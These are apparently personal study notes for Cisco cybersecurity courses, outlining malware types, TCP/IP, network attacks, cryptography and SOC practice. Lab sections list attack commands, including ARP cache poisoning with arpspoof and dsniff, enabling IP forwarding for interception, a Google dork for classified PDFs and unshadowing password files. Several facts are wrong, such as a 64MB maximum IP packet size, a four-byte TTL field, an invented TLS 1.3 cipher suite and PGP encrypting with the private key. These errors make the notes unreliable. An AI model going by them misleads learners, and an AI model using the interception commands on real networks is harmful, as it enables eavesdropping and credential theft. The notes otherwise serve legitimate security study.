1. Objectives:
    1. Exams pass and got certificates (passed on 14Oct2017)
    2. Learn something and got them to start with
    3. Knowledge transfer to your colleagues
  2. Course Structures
    1. Introduction to Cybersecurity (with Quizs)
    2. 210-250 SECFND (Understanding Cisco Cybersecurity Fundamentals)
    3. 210-255 SECOPS (Implementing Cisco Cybersecurity Operations)
  3. Contents (36 hours of lecturing in Systematic, assume other 72 hours self learning)
    1. Introduction to Cybersecurity
      1. Ch1 – The need for cybersecurity
        1. protection from unauthorized use of harm;
      2. Ch2 – Attacks, concepts and techniques
        1. Malicious software or malware, blended attack
          1. Types of malware
            1. Spyware
            2. Adware
            3. Bot: automatically perform action
            4. Ransomware: encryption until payment
            5. Scareware: persuade user to take action on fear
            6. Rootkit: modify OS to create backdoor, better reinstall OS;
            7. Virus (binds with executable files) / Trojan horse (binds with non-executable files, eg. jpg, videos) / Worm (self-replicate in network)
            8. Man-in-the-Middle
            9. Man-in-the-Mobile: take control of the mobile device
        2. Security vulnerabilities: defect
          1. Software security vulnerabilities:
            1. Buffer overflow: By changing data beyond the boundaries of a buffer; (?how to prevent in coding?)
            2. Non-validated input:
            3. Race conditions
            4. weakness in security practices: developers should use verified security library;
            5. access control problems: 1st prevent physical access;
          2. Hardware security vulnerabilities:
            1. RowHammer: repeat write to same address in RAM, then, retrieve data from address nearby;
        3. Exploit: a program that attempt to take advantage a vulnerabilities
        4. Social Engineering:
          1. pretexting
          2. tailgating
          3. Something for Something (Quid pro quo)
        5. Wifi password cracking
          1. social engineering / brute force attacks / network sniffing
        6. Phishing and spear phishing
        7. DoS (quantity and error packets) & DDoS
        8. SEO poisoning: malware to make fake website in higher ranking; redirect traffic to fake websites;
      3. Ch3 – Protecting your data and privacy
        1. Keep Firewall on;
        2. Use Antivirus and Anti-Spyware;
        3. Manage OS and browsers;
        4. Protect all your devices; especially IoT (better with isolated network);
        5. don’t use one password for all online account
        6. Use passphrases instead of passwords;
        7. Use password manager to store password master;
        8. Encryption: converting into a form that unauthorized one cannot read;
        9. Backup data on external disks or cloud-based storage; is the data erased at cloud-based after your deletion?
        10. Two factor authentication: least protection, but may be compromised by techniques such as social engineering;
        11. OAuth 2.0:
          1. access web app with your social media account (eg. Facebook);
          2. the web app must firstly registered with Facebook;
          3. You login the web app with Facebook, the web app will send a token to Facebook; then Facebook sends back a secret token to allow you login the web app and the app don’t know your credentials;
      4. Ch4 – Protecting the organization
        1. firewall: control and filter communication in and out;
          1. type: host based, network based, proxy, reverse proxy, network layer, transport layer, application layer, NAT, context aware;
        2. port scanning response: open / accept, closed / denied; dropped / filter;
        3. Security appliances: routers, firewalls, VPN, AMP, IPS
        4. Security best practices:
          1. perform risk assessment
          2. create security policy
          3. physical security measures
          4. HR security measures
          5. Perform and test backups
          6. Maintain security updates
          7. Employ access controls
          8. Regularly test incident response
          9. Implement a network monitoring, analytics and management tool;
          10. Implement network security devices;
          11. Use a comprehensive Enterprise Endpoint security solution: enterprise level anti-malware and antivirus software;
          12. Educate users
          13. Encrypt data
        5. Cyber kill chain
        6. Behavior-based security: context and patterns of behavior which could be used to detect anomalies; (eg. Netflow)
          1. honeypots & Cisco Cyber Threat Defense Solution Architecture
        7. Cisco Netflow technology – gather information of data flow in network; included in switch / router…;
        8. CSIRT – Computer Security Incident Response Team
        9. A Security Playbook – collection of repeated queries (report)
        10. Tools for Incident detection and prevention
          1. SIEM – Security Information and Event Management: collects and analyzes security alerts/logs;
          2. DLP – Data Loss Prevention software;
          3. Cisco ISE and TrustSec
        11. IDS – copy and mirror traffic for analysis to avoid traffic delay;
        12. IPS – open source as Snort
      5. Ch5 – Will your future be in Cybersecurity?
    2. SECFND
      1. Section1 – Understanding the TCP/IP Protocol Suite
        1. 1.1 Introduction
        2. 1.2 OSI Model
        3. 1.3 TCP/IP Model
        4. 1.4 Intro to the Internet Protocol:
          1. connectionless protocol (not guarantee delivery and recovery);
          2. IP header: 192 bits / 24 bytes
          3. Max. size of an IP packet: 65,535 Bytes ~ 64MB
          4. 4 bytes in header for Time to live to decrement in each node to prevent routing loop;
          5. IP address – Logical address; MAC address – Physical address;
        5. 1.5 IP Addressing: network address / host address / subnet mask
        6. 1.6 IP address classes
          1. Class A: 1-126
          2. Class B: 128-191; 65,534 hosts / network
          3. Class C: 192-223; 254 hosts / network
        7. Reserved IP addresses
          1. Network address, eg.
          2. Direct broadcast address, eg.
          3. Local broadcast address (never routed outside), eg.
          4. Local loopback address: 127.x.x.x
          5. Autoconfiguration IP addresses: DHCP / static IP
        8. Public and Private IP: in 3 classes and NAT;
        9. IPv6 addresses:
          1. headers
          2. 128 -bit value for IPv6 address;
          3. IPv6 address format: 16-bit hexadecimal field;
          4. Leading zeros for :: ;
          5. Unicast: one to one communication
          6. Multicast: one to many communication: FF01::1
          7. Loopback: ::1
          8. Unspecified (default route): ::
        10. Intro to the TCP:
          1. Layer 4, IP protocol No. 6; connections oriented (reliable); full duplex mode;
          2. TCP headers
            1. Window field: number of octets that the device is willing to accept;
        11. TCP three-way handshake (SYN & ACK bits in headers)
          1. Syn; Syn,Ack; Ack
          2. ISN: both senders and receivers generate sequence no.
        12. Intro to the UDP
          1. IP protocol no. 17; connectionless protocol
          2. TFTP / SNMP / DNS / NTP
        13. TCP and UDP ports
          1. well known port (1-1023); registered port (1024-49151); ephemeral ports (49152-65535);
        14. Address Resolution Protocol
          1. ARP: map IP addresses to MAC addres;
          2. 48 bit physical MAC address;
          3. operate at layer 2 and layer 3;
          4. Command: arp -a
          5. ARP messages are sent using Ethertype 0x0806;
        15. Host-to-host packet delivery using TCP
          1. ARP table
          2. ARP broadcast with FFFF:FFFF:FFFF
        16. Dynamic Host Configuration Protocol (UDP ports 67 & 68)
          1. DHCP attacks: Insertion of rogue DHCP servers (man-in-the-middle attack) & DHCP starvation;
          2. DHCP 4 steps (4 messages exchanged)
            1. DHCPDISCOVER
            2. DHCPOFFER
            3. DHCPREQUEST
            4. DHCPACK
        17. Domain Name System
          1. TCP and UDP 53
          2. Attacks: redirect to malicious system and DDoS;
        18. Internet Control Message Protocol
          1. ping utility sends ICMP echo request and receives ICMP echo reply packets;
          2. 4 types of message
            1. Network-unreachable
            2. Host-unreachable
            3. Protocol-unreachable
            4. Port-unreachable
          3. “ICMP time-exceeded” message is sent by the router if an IP packet’s TTL field reaches zero
        19. Packet Capture Using tcpdump
          1. SPAN in switch
          2. In Linux <tcpdump –help>
          3. “promiscuous mode” at network card to capture traffic;
        20. Wireshark
          1. use proprietary syntax option to display filter; tcpdump uses BPF;
        21. Lab
          1. Examine ARP and ICMP packets;
            1. Kali Linux: ifconfig; cat /etc/resolv.conf; netstat -r;
            2. Command to check MAC table: arp -a
            3. Two packets for ARP exchange (for source); Two packets for ARP exchange (for destination); 8 ICMP packets (4 echo request-echo reply pairs);
          2. Examine Ethernet headers
            1. Types in Ethernet header: pointer from this layer to the next layer. In today’s networking environments, three ethertypes are the most common: 0x0800 for IPv4, 0x86DD for IPv6, and 0x0806 for ARP;
            2. Validation of the frame check sequence is often offloaded to the NIC hardware which empty frame check sequence and forwards it up, but Wireshark is not aware of the hardware offload, thus, flags it as error;
          3. Examine IP header
          4. Examine ICMP header and data
            1. DNS queries for AAAA records which map hostnames to IPv6 addresses;
          5. Examine TCP connection
            1. Right click packet and select “Follow” in WireShark;
            2. Statistics > Conversations > TCP tab
      2. Section2
        1. Network infrastructures: interconnected group of hardware and software resource;
        2. Analyzing DHCP operations DORA (UPD 67 at server; UDP 68 at client)
          1. DHCPDISCOVER (broadcast)
          2. DHCPOFFER (unicast)
          3. DHCPREQUEST (broadcast)
          4. DHCP (unicast)
        3. IP Subnetting (subnets connected by routers)
          1.  easier management and better security;
          2. subnet mask
          3. VLSM (variable Length Subnet Masks): hierarchical networking, divide networks into subnetworks…
        4. Hubs, bridges, and layer 2 switches
          1. Hub: multiport repeater; single broadcast domain; single collision domain; OSI physical layer; half-duplex
          2. bridge: OSI datalink layer; limited ports
          3. Layer 2 switch: OSI datalink layer; multi-port bridges
            1.  Linux attack tool called macof
            2. flood switch mac address table like DoS attack; then capture flooded frames to obtain sensitive info;
        5. VLANs and Trunks
          1. VLAN: logical broadcast domain (layer 2) that can span multiple physical LAN segments; segmented logically by functions, project teams, and applications;  interconnect two different VLANs, you must use routers or Layer 3 switches;
          2. Trunks:  a conduit for VLANs between switches and routers to connect multiple VLANs together; does not belong to a specific VLAN;
            1. IEEE 802.1Q: 4-byte tagging field into the original Ethernet frame
            2. By default, one native VLAN, which is untagged (by default, VLAN 1)
        6. Spanning Tree Protocols (STP) in switch (IEEE 802.1D)
          1. Layer 2; locates and stops Loops;
          2. root bridge elected by STP;
        7. Standalone (Autonomous) and Lightweight Access Points
          1. 2 solutions: standalone or controller-based
            1. Standalone:
              1. configure autonomous APs one by one; BSS (Basic Service Set); BSSID (Basic Service Set Identifier; unique with MAC address ); SSID (human readable text string);
              2. for small deployments;
            2. Controller-based
              1. configure LWAPs (Light Weight Access Point – config. is done by central WLC) by WLAN controllers;
              2. CAPWAP (Control and Provisioning of Wireless Access Point): WLC and LWAP could be on different IP subnets, encapsulating the data between the LWAP and WLC;
              3. Light weight AP interacts clients at MAC layer;
          2. RF frequency
          3. WLAN controller & Light weight AP
        8. Routers (routing table)
          1. Functions
            1. path determination with administrative distance by routing protocols;
            2. packet forwarding between subnets;
          2. Types of routes
            1. default route (gateway);
            2. directly connected networks;
            3. static routes: for small network configurations;
            4. Dynamic routes
              1. IGP (eg. RIP…)
              2. EGP (eg. BGP…)
        9. Routing Protocols:
          1. Objective: exchange network reachability information between routers and dynamically adapt to network changes;
          2. Best Practices:
            1. use one IP routing protocol throughout the enterprise;
            2. for using 2 IP routing protocol, normal with BGP and OSPF/EIGRP;
          3. Grouping
            1. Within or between ASs: IGP (Interior Gateway Protocols) / EGP;
            2. How they operate:
              1. Distance Vector Protocols (EIGRP & RIPv2): distance and direction
              2. Link-state Protocols (OSPF & IS-IS): determine best path by SPF;
              3. Path Vector Protocols (BGP): path and direction
        10. Multilayer Switches (Layer 3 switches)
          1.  use ASIC (application-specific integrated circuit) hardware to perform header rewrites and forwarding; SVI;
          2. CAM (content-addressable memory) table (L2 forwarding table)
          3. FIB (forwarding information base) table, L3 forwarding table;
          4. TCAM table contains ACLs; QoS decision;
        11. NAT Fundamentals
          1. NAT: Inside local (RFC 1918), inside global, outside local, outside global;
          2. PAT
          3. types:
            1. static NAT (eg. DMZ)
            2. dynamic NAT
            3. static PAT (NAT overload, Hide NAT and Many to One NAT)
            4. dynamic PAT (port forwarding)
            5. Policy NAT
        12. Packet Filtering with ACLs
          1. ip access-group command
          2. explicitly denied (listed); implicitly denied (not listed);
        13. ACLs with the Established Option (stateful behavior)
          1. established keyword (originate state): eg. ACK or RST;
          2. established does not imply stateful inspection (established allows ACK scan (TCP ACK/TCPRST), while stateful packet filter will drop the packet);
          3. FTP active / passive mode
        14. Explore the Network infrastructure (Cisco IOS CLI: switches, routers, firwalls, NAT, DHCP)
          1. sh int status / show interface status
          2. sh mac address-table dynamic
          3. tcpdump at Linux; tcpdump -n not stp and not ether proto 0x90000
          4. (config-if)switchport access vlan 3
          5. (config-if)switchport trunk
          6. Win cmd > ncpc.cpl
          7. sh ip ospf neighbor
          8. sh ip route
          9. sh ip arp
          10. nmap @ linux for port scanning (Nmap doesn’t actually complete the three-way handshake (FIN) when it scans. It resets (RES) the connection before it completes)
          11. DHCP packets in Wireshark: View > Fitler > bootp
          12. firewall session logs provide the standard 5-tuple Protocol, IP Address:Port, IP Address:Port
        15. Challenge
          1. Concepts: Switches place each switch port into its own collision domain; while VLANs separate a large broadcast domain into smaller broadcast domains;
          2. link-state protocols = Each router determines the best path on its own;
          3. distance-vector protocols = does not have an actual map of the network topology;
          4. implicit ACL entry that is at the end of the ACL “deny ip any any
      3. Section 3 – Understanding Common TCP/IP attacks
        1. Legacy TCP/IP vulnerabilities
          1. Morris Worm 1988, gauge the size of ARPPNET;
          2. Main protocols in IP suites (IP, TCP, UDP, ICMP);
        2. IP vulnerabilities
          1. Man-in-the-middle attack (MITM): key: wait unit connection is established
          2. Session hijacking (eg. sniffing session cookies, ) (initiated by MITM)
          3. IP address spoofing (gratuitous ARP that I am someon)
            1. blind and nonblind (include ISN sequence number prediction/guess)
          4. DoS (faked IP with TCP SYN) and DDos (initiated by blind IP spoofing, multiple sources): prevent legitimate users from accessing information or services
            1. Such as packet floodsservice buffer overflow, teardrop;
          5. Smurf attack: ping
          6. Resource exhaustion attacks:
        3. ICMP vulnerabilities (connectionless protocol that does not use any port number and works in the network layer)
          1. reachability (ping / tracerout (ICMP TTL expired in transit))
          2. ICMP  query and error
          3. Attacks
            1. ICMP sweep attacks / network reconnaissance refers to the act of scanning the target network to gather information about the target (begins with Reconnaissance such as nmap)
            2. Traceroute (attacker sends packets with increasing TTL to learn topology)
              1. ICMP unreachables
              2. ICMP mask reply
              3. ICMP redirects (example of MITM)
              4. ICMP router discovery
              5. Firewalk attack
                1. techniques to analyze IP packet responses to determine the gateway ACL filters and map out the networks;
                2. sending out TCP or UDP packets with a TTL that is one greater than the targeted gateway;
            3. ICMP tunneling (ICMPTX)
              1. convert connection between two computers;
              2. LOKI could transfer message secretly by ICMP protocols; and could not be discovered with deep inspection;
            4. Inverse mapping attacks
            5. ICMP-based OS fingerprinting attacks
              1. TTL-128 is Windows; TTL-64 is Linux;
            6. DDoS
              1. flood target network services with spoofed ICMP echo request;
              2. Smurf attack: trigger ICMP echo replies in volume by spoofed ICMP requests to bring down target’s resources;
            7. ICMP informational message attacks
            8. ICMP router discovery message attacks
        4. TCP vulnerabilities (TCP: flow control, reliability, stateful connection)
          1. TCP SYN Flood
          2. TCP Session Hijacking
            1. Tools: Juggernaut, Hunt, TTY Watcher, T-Sight;
          3. TCP Reset Attack
            1. FIN > ACK > FIN > ACK
            2. an effective way to disrupt any TCP connection that an attacker can monitor;
            3. <connection established> is affected;
        5. UDP vulnerabilities
          1. less overhead as connectionless and no reliability
          2.  UDP header, SNMP, SQL slammer;
        6. Attack surface and attack vectors
          1. Attack surface: sum of all the vulnerabilities in a given computing device or network that are accessible to the attackers
            1. network: open ports, insecure protocols, users for admin, low bandwidth;
            2. software: improper coding, privacy, patch mgt;
            3. physical: internal employees, rogue devices, social engineering, passwords on sticky notes, phishing
          2. attacks are unstoppable;
          3. focus on high risk / high impact areas; analysis of attack surface; advanced techniques and technologies;
          4. Attack vectors: paths or means by which the attackers gain access to a resource (such as end-user hosts or servers) in order to deliver malicious software or malicious outcome
            1. eg. SQL injection; DDoS, Phishing, Eaves dropping, Malware injection
          5. Prevention
            1. honeypots, load balancers, advanced firewall protection, updated Antivirus, security policy enforcement, education, SIEM tools;
        7. Reconnaissance attacks
          1. learn more about the intended victim before attempting a more intrusive attack;
          2. techniques: wardriving; port scanning; password guessing;
          3. tools: nmap, Paratrace, OpenVAS, Nessus;
          4. Port scanning
          5. End user: properly trained;
          6. App: vetted by IT,
          7. Types:
            1. passive: Wireshark, keyloggers;
            2. active: Nmap, Nessus, OpenVAS;
          8. Mitigating by:
            1. tight security controls;
            2. SSH
            3. Obscure device names;
            4. strong encryption;
            5. VLANS and Private VLANs (promiscuous port)
            6. IDS / IPS;
            7. NAT / PAT;
          9. Shodan Search Engine
        8. Access attacks
          1. technique of accessing network / user devices and take control of them;
          2. Tools:
            1. Ncrack
            2. Aircrack-ng
            3. CeWL
            4. Crunch
            5. Medusa
            6. RainbowCrack
            7. John the Ripper: unshadow password file
          3. prevention:
            1. filter by ACLs
            2. Multifactor authentication when possible
              1. SMS
            3. WPA2 for wifi
            4. IDS/IPS
            5. Enforce AAA identity management (CISCO ISE)
        9. Man-in-the-middle attacks (eavesdropping attacks or connection hijacking attacks)
          1. clear text communication: telnet, HTTP;
          2. Tools: Ettercap, dsniff;
          3. ARP-based by ARP poisoning: poisons the ARP cache of two devices with the MAC address of the attacker’s NIC
          4. ICMP-based by ICMP redirection
          5. DNS-based by DNS spoofing
          6. DHCP-based
          7. Prevention:
            1. VPN: encrypted traffic
            2. Digital certificates
            3. Strong passwords
            4. Dynamic ARP inspection
            5. IP spoofing detection
            6. DHCP snooping
        10. DoS and DDoS
          1. Ping of Death (history): full packet size > 64MB;
          2. ICMP / UDP floods: flood out a network
          3. Botnet: CnC traffic is sent using either IRCP2PDNS, HTTP, and HTTPS
          4. DDoS Trends
            1. Use of cloud-based computing devices
            2. DarkSeoul
            3. Ransomware
            4. Cryptolocker
          5. Preventation
        11. Reflection and Amplification (type of DoS attack)
          1. others become reflectors / responders and flood targets
          2. Smurf attack
          3. mitigation
            1. no ip directed broadcast
          4. not a real attack method anymore
          5. March 2013, DNS amplification: killed websites, exploiting DNS open recursive resolvers; 300Gbps of traffic;
          6. Feb 2014, NTP Amplification attack: 400Gbps of traffic; monlist in NTP;
        12. Spoofing attacks (spoofing is not attack, but incorporated into various types of attacks)
          1. ARP spoofing
          2. Mitigation
            1. snort
            2. ARPwatch
            3. Dynamic ARP Inspection
          3. IP spoofing
            1. mitigation
              1. ACL over private IP
          4. DNS spoofing: guess the sequence number
            1. mitigation: DNSSEC and add digital certificates
          5. Email spoofing
            1. lacks of authentication features in SMTP protocol
            2. Mitigation
              1. spam filtering
              2. cross check email header from
              3. Do not click unknown sources
              4. digital certificates, strong passwords, signatures
          6. Land attack: file land.c
            1. sends a TCP SYN request using the same IP address and port as both the source and destination IP address and port, leads to a system crash if vulnerable;
        13. DHCP attacks
          1. DHCP starvation
          2. DHCP spoofing (lead MITM attack)
          3. Mitigation
            1. DHCP snooping by Cisco switch (rate limit and port control)
        14. Lab: Explore TCP/IP attacks
          1. footprinting techniques: profiling target and difficult to detect
            1. whois -H | more command: The -Hargument removes lengthy legal disclaimers from the output;
            2. nslookup
            3.  track information about public Internet presence
              1. What’s that site running?
            4. Google hacking:  “classified” filetype:pdf site:targetorgnization.domain
          2. Fingerprinting (scanning to clearer picture)
            1. slowing the rates of scanning and use other obfuscation techniques to limit attention;
            2. Zenmap Ping Scan: two types of probes – an ICMP echo request and crafted TCP ACK destined to TCP port 80. (
            3. Zenmap Quick Scan: list of opened ports
            4. Zenmap Intense Scan: noisy but could recognize app version
          3. Discrete OS Scanning
            1. TTL: IOS/255, Windows/128, Linux/255;
            2. Window size value
          4. Passive OS Fingerprinting (packet capture)
            1. reveal TTL values and initial TCP window sizes;
            2. Linux patches: IP Personality and Stealth Patch;
          5. Malicious Route Injection (work with other attacks)
            1. Loki is a security tool that was written to demonstrate weaknesses in routing protocols
            2. Loki negotiates with the Inside-Rtr, you should see the STATE start in Hello and cycle through 2WAY, EXSTART, EXCHANGE, and LOADING. It might also reach FULL after LOADING
            3. sh ip ospf neighbor
            4. sh ip route
          6. ARP Cache Poisoning
            1. Objective: MITM attack
            2. Tool dsniff suite;
            3. command: arp -a
            4. Linux cmd: arpspoof -t
            5. dsniff -ccommand to start dsniff in half duplex mode. Monitoring the traffic being sent through.
            6.  sysctl -w net.ipv4.ip_forward=1 command to enable IP forwarding on Inside-Kali
            7. fingerprinting on the gateway and saw that Telnet was enabled – Interesting for interception!
        15. Challenge: smurf
      4. Understanding Basic Cryptography Concepts
        1. Intro: Conficker, CIA triad
        2. Impact of Cryptography on Security Investigations
          1. attack the algorithms: target weakness
            1. eg. OpenSSL Heartbleed (CVE-2014-0160): get private data in server memory;
          2. to hide attack;
            1. Detection: TLS/SSL decryption and inspection, or using NetFlow to detect anomalous TLS/SSL flows;
        3. Cryptography Overviews
          1. Elements of cryptography (CDON)
            1. Confidentiality: only authorized on can read;
            2. Data integrity: any changes will be detected and rejected;
            3. Origin authentication: only sent from the perceived  origin;
            4. Non-repudiation: original cannot deny producing the message;
          2. Cryptanalysis: study of determining and exploiting weakness
          3. Types of Ciphers
            1. Substitution cipher: substitute one letter for another;
            2. Polyalphabetic cipher: multiple substitution alphabets;
            3. Transposition cipher: rearrange or permutate letters;
            4. One-time pad: XOR operation to plaintext with a random key;
        4. Hash Algorithms
          1. data integrity assurance: one-way mathematical function, difficult to reverse; defeats man-in-the-middle attacks and provides authentication of the data origin;
          2. hash code, hash value, hash sum;
          3. Challenge:
            1. Hash Collison: identical output for different inputs;
          4. Message Digests
          5. Types:
            1. MD5 (Message Digest 5): 128bit hash function, most susceptible for collision attacks;
            2. SHA-1 (Secure Hash Algorithm 1): US developed, NIST std, 160 bit hash function
            3. SHA-2:
            4. SHA-3
            5. Message rearranging
            6. Division reminder
        5. Encryption Overview: process of hiding message
          1. Plain text > Cypher;
          2. Encryption key & Encryption Algorithm;
          3. Types of Encryption
            1. Application – PGP (Pretty Good Privacy), SSL/TLS
            2. Internet – IPSec
            3. Data Link – MacSec
          4. Encryption Algorithms
            1. longer keys take longer to crack, but performance overhead;
            2. Symmetric
            3. Asymmetric: public key and private key
        6. Cryptoanalysis: practice of breaking the codes
          1. Brute-force attack: trying as many possible keys
            1. DES (cracked), AES
          2. Ciphertext-only attack: look into ciphertext to decrypt
            1. plain-text attack:
            2. chosen-ciphertext attack: analyze keys
          3. Birthday attackbrute-force attack against hash functions;
          4. Meet-in-the-middle: knows a portion of the plaintext and the corresponding ciphertext. store values of encrypted plaintext and decrypted ciphertext;
        7. Symmetric Encryption Algorithms
          1. same key for encryption and decryption;
            1. 40 bits to 256 bits, better larger than 80 bits;
          2. Challenge: key management
          3. Symmetric encryption algorithms
            1. DES: encrypts data in 64-bit blocks; with 64 bits key length in which 56 bits for encryption and 8 bits for parity;
              1. 2 standardized block cipher modes:
                1. ECB (Electronic CookBook): serially encrypts each block;
                2. CBC (Cipher Block Chaining): XORed and depend on previous block;
            2. 3DES – EDE (Encrypt – Decrypt – Encrypt)
            3. AES: replace 3EDS
            4. RC4: stream cipher used to secure web traffic in SSL and TLS
          4. Rotate keys often
        8. Asymmetric Encryption Algorithms
          1. Encrypt with the target public key;
          2. Decrypt with the private key;
          3. RSA (1024-4096 keys)
          4. rotate keys every few months
          5. PGP (Pretty Good Privacy)
            1. encrypt with private key
            2. then, encrypt with public key
        9. Diffie-Hellman Key Agreement (in protocols such as SSL/TLSSSH, and IKE);
          1. both agree on large prime number p and a generator g;
          2. Allowing the exchange of shared secrets over public medium without revealing the key;
          3. DH groups: higher group numbers are more secure;
        10. Use Case: SSH process of communication
          1. Command line application
          2. encryption, integrity, origin authentication
          3. SSHv1 (not secure): private / public key to encrypt symmetric key for session; clear text
          4. SSHv2: DH key
        11. Digital Signatures
          1. authenticity, integrity, nonrepudiation
          2. encrypt by private key of sender
          3. consist a Hash function and a encryption function
            1. encrypt (by RSA private key) the Hash fingerprint and attach to the data and send out;
        12. PKI Overview
          1. trusted 3rd party
          2. CA hierarchy: trusted third party
            1.  CA signs the certificate;
            2.  encrypts the hash using its private key;
            3. CA send signed certificate to Web server;
          3. Certificate: A document, which in essence binds together the name of the entity and its public key
          4. PKCS: Public Key Cryptography Standard
          5. X.509 is an ITU-T standard for PKI
        13. PKI Operations
          1. CA hierarchy
          2. pre-loaded CA public key (Root Certificate) in Internet browsers
            1. to authenticate other’s public keys
            2. manually,  use an out-of-band method to validate the certificate
          3. obtain identity certificate
            1. first step is to obtain the CA’s identity certificate;
            2. create a CSR (certificate signing request) (PKCS #10) (enrolling system’s public key is included)
            3. identity data from the CSR, and add in the CA-specified data, such as serial number, the dates, and the algorithm, to complete the X.509v3 structure
            4.  sign the certificate by hashing the certificate data and encrypting the hash with its private key
            5. all users use the root CA’s public key to validate the signature on any certificate they receive
            6. Send a message encrypted with the system’s peer’s public key to verify that the peer can decrypt the message with the private key
          4. Certificate Revocation (if keys are thought to be compromised)
            1. centralized function, providing “push” and “pull” methods to obtain a list of revoked certificates;
            2.  to check for certificate revocation
              1. CRL (certificate revocation list) (signed file with serial no. of revoked cert.)
                1. Poll CRL
                2. small time period when CRL has not yet propagated
              2. OCSP (Online certificate status protocol)
                1. immediate push to online database
                2. query anytime to check for validity
        14. Use case: SSL/TLS
          1. Process
            1. User connect to port 443 for SSL/TLS
            2. server replies with identity cert containing public key;
            3. user validate the cert. and public key
            4. user software create a shared secret key and encrypt with server’s public key;
            5. Bulk encryption using shared secret key;
          2. Web browser security warnings
            1. hostname / identity mismatch
            2. validity date range (expiring)
            3. signature validation error
        15. Cipher Suite
          1. SSL (Secure Socket Layer)/ TLS (Transport Layer Security)
            1. For: client / server encryption; key exchange; message authentication;
            2. TLS1.2 added SHA-256 and SHA-384;
          2. 4 components of a Cipher Suite
            1. MAC (Message Authentication Code Algorithms)
            2. Key Exchange Algorithms
            3. Encryption Algorithms
            4. Authentication Algorithms
          3. TLS Cipher Suite Examples
            1. TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
            2. TLS1.2: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
            3. TLS1.3: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA_256_P384
          4. legacy cipher suites available in TLS are insecure: DES or RC4 encryption or MD5;
        16. Key Management
          1. Aspects
            1. Securely generate keys: strong and randomization
            2. Verify keys:
            3. Exchange keys: keying material used
            4. Store keys: trojan horse may access swap memory
            5. Destroy keys: all involved parties are notified
          2. key spaces: combinations / possibility
          3. larger key length = longer time
        17. NSA Suite B Compliance (devices must support to meet federal standards )
          1. Encrypion: AES 128-256 with CTR / GCM;
          2. Digital Signature: ECDSA
          3. Key Exchange: ECDH
          4. Message Digest: SHA 256-384
        18. Explore Cryptographic Technologies Lab
          1. PKI -> Digital Signatures -> Asymmetric encryption and hashing
          2. Hashing – output as fingerprint / digest; one-way transforms
            1. linux: md5sum filename; sha1sum filename;
            2. MD5 collisions
            3. IOS enable secret (as *nix system): a four-character salt phrase is generated and combined with the password text and the result is hashed; alt phrase and the resulting hash are stored in the running configuration
            4. show run | section enable
              1. $1 specifies that MD5 transformation is used
              2. $F/bO is a random four-character salt phrase
              3. the rest is the digest
          3. Symmetric Encryption – Shared key algorithms
            1. linux command: diff artofwar.txt artofwar2.txt
            2. openssl enc -aes-128-cbc -in artofwar.txt -out artofwar.crypt
            3. openssl enc -d -aes-128-cbc -in artofwar.crypt -out artofwar3.txt
            4. openssl list-cipher-algorithms
          4. Asymmetric Encryption: computationally expensive than symmetric encryption, thus, asymmetric encrypt the shared key and then symmetric encryption for bulk data transfer;
            1. debug ip ssh / undebug all
            2. terminal monitor command to display logging messages to this Telnet session
            3. Open another terminal: ssh -1 -l admin
            4. Digital signature: private key to encrypt hash value
              1. openssl genrsa -aes128 -passout pass:Cisco123! -out private.pem 4096
              2. openssl rsa -in private.pem -passin pass:Cisco123! -pubout -out public.pem
              3. /var/www/files#openssl rsautl -sign -inkey private.pem -in artofwar.digest -out artofwar.sig
              4. openssl rsautl -verify -inkey public.pem -pubin -in artofwar.sig
              5. file generation: private.pem > public.pem > artofwar.digest > artofwar.sig >
        19. Challenge
          1. avalanche effect: small changes in data causing a large change in the hash;
          2. Diffie-Hellman: DH prime number / DH base generator / DH group / DH modulus;
          3. ECDHE_ECDSA stronger than using RSA: If the server’s private key is later compromised, all the prior TLS handshakes that are done using the cipher suite cannot be compromised
      5. Describing Information Security Concepts
        1. Information Security CIA
          1. vulnerability: weakness
          2. Trends bring needs of enhanced security:
            1. Growing of network size and ease to access;
            2. TCP/IP widespread that use a common set of widely known ports and protocols;
            3. More complicated OS and app;
        2. PII (Personal Identifiable Information)
          1. apply confidentiality when handling it
        3. Risk = Threat*Vulnerabilities*Impact
          1. Threat: trigger
          2. Vulnerabilities: weakness
          3. Impact: damage
          4. Risk assessments: quantitative (by money) and qualitative (by grading);
          5. APT (Advanced Persistent Threat): network attack in which an unauthorized person gains access to a network and stays there undetected for a long time period
          6. Risk management: assess risk and manage to acceptable level
            1. Risk acceptance: cost
            2. Risk avoidance: most expensive
            3. Risk limitation: commonly used, mixed with acceptance and avoidance;
            4. Risk transfer: eg. insurance
        4. Vulnerability Assessment
          1. Risk analyst:
            1. what is/are vulnerabilities facing?
            2. differences between threats and vulnerabilities?
          2. 4 activities in vulnerability assessment process:
            1. device discovery
            2. service enumeration
            3. scanning
            4. validation
          3. Cycle: Discover -> Scan -> Interpret -> Mitigation;
          4. Penetration Testing
        5. CVSS v3.0 Common Vulnerability Scoring System (
          1. Free and open industry framework
        6. Access Control Models
          1. Models
            1. Mandatory: strictest; in military; defined by administrators;
              1. uses security labels with classification and category
              2. access is granted when classification and category match;
              3. High management overhead;
            2. Discretionary (DAC) (eg. file system permission)
              1. By access control list;
              2. owner of the information can change the permissions;
            3. Non-discretionary (RBAC)
              1. based on role-based / rule-based;
            4. Others:
              1. least privileges: time based
              2. separation of duties: more than one person to complete a task;
        7. Regulatory Compliance
          1. PCI DSS / HIPPA…
        8. Information Security Management
          1. Identify assets and protection to them
          2. ITAM
          3. Configuration management: performance and requirement
          4. Patch management
          5. Vulnerability management
          6. MDM Mobile Device Management
          7. IT security control frameworks (best practices) (best to use together)
            1. COBIT
            2. ISO27002:2013
        9. Security Operations Center (SOC)
          1. SOC + NOC
          2. SIEM Security Information Event Management
          3. 3 types
            1. Threat-Centric SOC (most mature): think like attacker
            2. Compliance-based Centric SOC
            3. Operational-based SOC
          4. OpenSOC project
        10. Challenge
      6. Understanding Network Applications
        1. DNS Operations
          1. A: map hostnames to IPv4 address
          2. AAAA: map hostnames to IPv6 address
          3. PTR: map IPv4 address to hostname, reverse lookup;
        2. Recursive DNS Query
          1.  DNS resolver (DNS client)
          2. DNS recursor (DNS recursive resolver)
          3. RR (Resource Record)
          4. Authoritative DNS query response (from local DNS database)
        3. Dynamic DNS
          1. RFC 2136
          2. map client login name of the DDNS software to client’s public IP;
          3. DDNS services use HTTP or HTTPS as the communication protocol;
        4. HTTP Operations
          1. URL:
            1. parameters / query strings
            2. separated by &
            3. ?
            4. fragment or named anchor
